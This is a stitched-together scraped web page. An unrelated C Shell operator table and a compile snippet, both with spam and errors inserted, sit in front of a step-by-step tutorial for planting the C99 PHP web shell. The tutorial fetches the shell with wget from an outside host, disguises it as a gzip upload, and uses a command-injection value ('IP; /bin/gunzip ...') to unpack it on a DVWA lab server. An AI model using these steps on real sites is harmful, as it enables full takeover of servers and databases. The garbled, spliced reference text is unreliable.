C99 Shell Tutorial

  



If the code shown above (either version) is stored in file hello.c, then you can compile the code into a program hello using either c99 or make. For example, in a strictly POSIX compliant mode, you might in theory compile and run the program using: $ make hello c99 -o hello hello.c $./hello Hello, World $. Raj Chandel is Founder and CEO of Hacking Articles. He is a renowned security evangelist. His works include researching new ways for both offensive and defensive security and has done illustrious research on computer Security, exploiting Linux and windows, wireless security, computer forensic, securing and exploiting web applications, penetration testing of networks.

  1. C99 Php Shell Tutorial
  2. C99 Shell Download
  3. C99 Download
  4. C99shell Tutorial
  • Unix / Linux for Beginners
  • Unix / Linux Shell Programming
  • Advanced Unix / Linux
  • Unix / Linux Useful Resources
  • Selected Reading

We will now list down all the operators available in C Shell. Here most of the operators are very similar to what we have in C Programming language.

Operators are listed in the order of decreasing precedence −

Arithmetic and Logical Operators

The following table lists out a few Arithmetic and Logical Operators −

Sr.No.Operator & Description
1

( )

Change precedence

2

~

1's complement

3

!

Logical negation

4

*

Multiply

5

/

Divide

6

%

Modulo

7

+

Add

8

-

Subtract

9

<<

Left shift

10

>>

Right shift

11

String comparison for equality

12

!=

String comparison for non equality

13

=~

Pattern matching

14

&

Bitwise 'and'

15

^

Bitwise 'exclusive or'

16

|

Bitwise 'inclusive or'

17

&&

Logical 'and'

18

||

Logical 'or'

19

++

Increment

20

--

Decrement

21

=

Assignment

22

*=

Multiply left side by right side and update left side

23

/=

Divide left side by right side and update left side

24

+=

Add left side to right side and update left side

25

-=

Subtract left side from right side and update left side

26

^=

'Exclusive or' left side to right side and update left side

27

%=

Divide left by right side and update left side with remainder

File Test Operators

The following operators test various properties associated with a Unix file.

Sr.No.Operator & Description
1

-r file

Checks if file is readable; if yes, then the condition becomes true.

2

-w file

Checks if file is writable; if yes, then the condition becomes true.

3

-x file

Checks if file is executable; if yes, then the condition becomes true. Download mortal kombat 4 setup.

4

-f file

Checks if file is an ordinary file as opposed to a directory or special file; if yes, then the condition becomes true.

5

-z file

Checks if file has size greater than 0; if yes, then the condition becomes true.

6

-d file

Checks if file is a directory; if yes, then the condition becomes true.

7

-e file

Checks if file exists; is true even if file is a directory but exists.

8

-o file

Checks if user owns the file; returns true if the user is the owner of the file.

Here you go with another GREAT TUTORIAL ;)!

---



Requirements: .DVWA Pen testing lab, go here to learn how to setup one: http://adf.ly/aQmQ
  • Backtrack 4 or higher version or (Kali Linux)
  • Brain
How to Upload C99.php (Shell) Backdoor ?
As you know guys - Websites don't allow us to upload PHP file on their server, so simply hackers uses many ways to upload Shell on Server & if once shell uploaded - then complete website, Server, Database will be hacked. Commonly hackers uses different types of Vulnerabilities in websites to upload Shell such as Command Execution, XSS, SQL Injection, LFI, RFI upload vulnerability. So here today m gonna show you simple tutorial - How can you upload C99shell PHP backdoor on Website server using Command Execution and Upload Vulnerability. Please use OWASP BWA or DVWA Penetration testing lab. So Enjoy it.
Steps to Hack:
Github
1. Start your DVWA, Keep security on 'Low' level & Click on Upload.
2. Okay, now m using Backtrack 5- I'll also recommend you to use same OS.
3. Start Backtrack Terminal, and type mkdir -p /root/backdoorhit Enter Again type cd /root/backdoor& Hit Enter.
4. Now, it's time to download PHP Backdoor, type :
  • wget http://r57.gen.tr/shell/c99.rar(Hit Enter) & wait until it downloads C99.rar, Okay.! it's downloaded
  • Once again type ls -l c99.rar Hit Enter.
4. Okay - now we've to convert it into .gz & edit C99.php file to be executed
5. Go through below all commands :
  • unrar x c99.rar (Hit Enter)
  • cp c99.php c99.php.bkp (Hit Enter)
  • head -1 c99.php (Hit Enter)
  • sed -i '1 s/^.*$/<?php/g' c99.php (Hit Enter)
  • head -1 c99.php (Hit Enter)
  • gzip c99.php (Hit Enter)
  • ls -l (Hit Enter)
6. Click on Below Image to Enlarge it & See commands :
7. You can see it in root folder we got new compressed c99.php.gz
8. Come-on back to DVWA - Upload and upload c99.php.gz file, simply we
can't upload C99.php shell so we'll use evil mind.
Click on Image to Enlarge it

9. Now, locate that file into web browser - Basically it will be at this location.
  • YOUR_DVWA_IP_ADDRESS/dvwa/hackable/uploads
  • Replace Green text with your DVWA lab IP Address as mine is :
  • http://192.168.32.128/dvwa/hackable/uploads
10. Well, it will not work until we get .php file so now the next target is to
unzip that file and extract it into server. it's pretty cool : we'll use Command Execution techniques to Hack Website.
11. What is Command Execution : Command Execution is one of the most dangerous vulnerability that allows an attacker to send unwanted commands to web server and compromise server,database and files. It can also lead to Website Defacement, MySQL Shutdown, File Upload Vulnerabilities, Creating multiple vulnerabilities.

C99 Php Shell Tutorial

12. So today we gonna execute our command on web server to unzip our file and finally we're done. Okay.! let's hack.
13. Click on Command Execution DVWA : & Send below command to Server :
  • YOUR_DVWA_IP; /bin/gunzip -v ./ ./hackable/uploads/c99.php
  • Replace Green text with your DVWA IP as mine is:
  • 192.168.32.128; /bin/gunzip -v ./ ./hackable/uploads/c99.php
  • And Click on Submit.
14. Well, now you'll get successfully message as shown in the below Image.
Click on Image to Enlarge it

15. Okay! now once again locate upload directory, & you'll see that your compressed file in uncompressed. COOL.! Command Execution Rocks.
Click on Image to Enlarge it

C99 Shell Download


16.Ok Click on it and you're done. Now complete Database, Server, Website, files, and all control is in your hand. Now do whatever you want to.

C99 Download

For Educational Purposes only, I am not responsible for your loss

C99shell Tutorial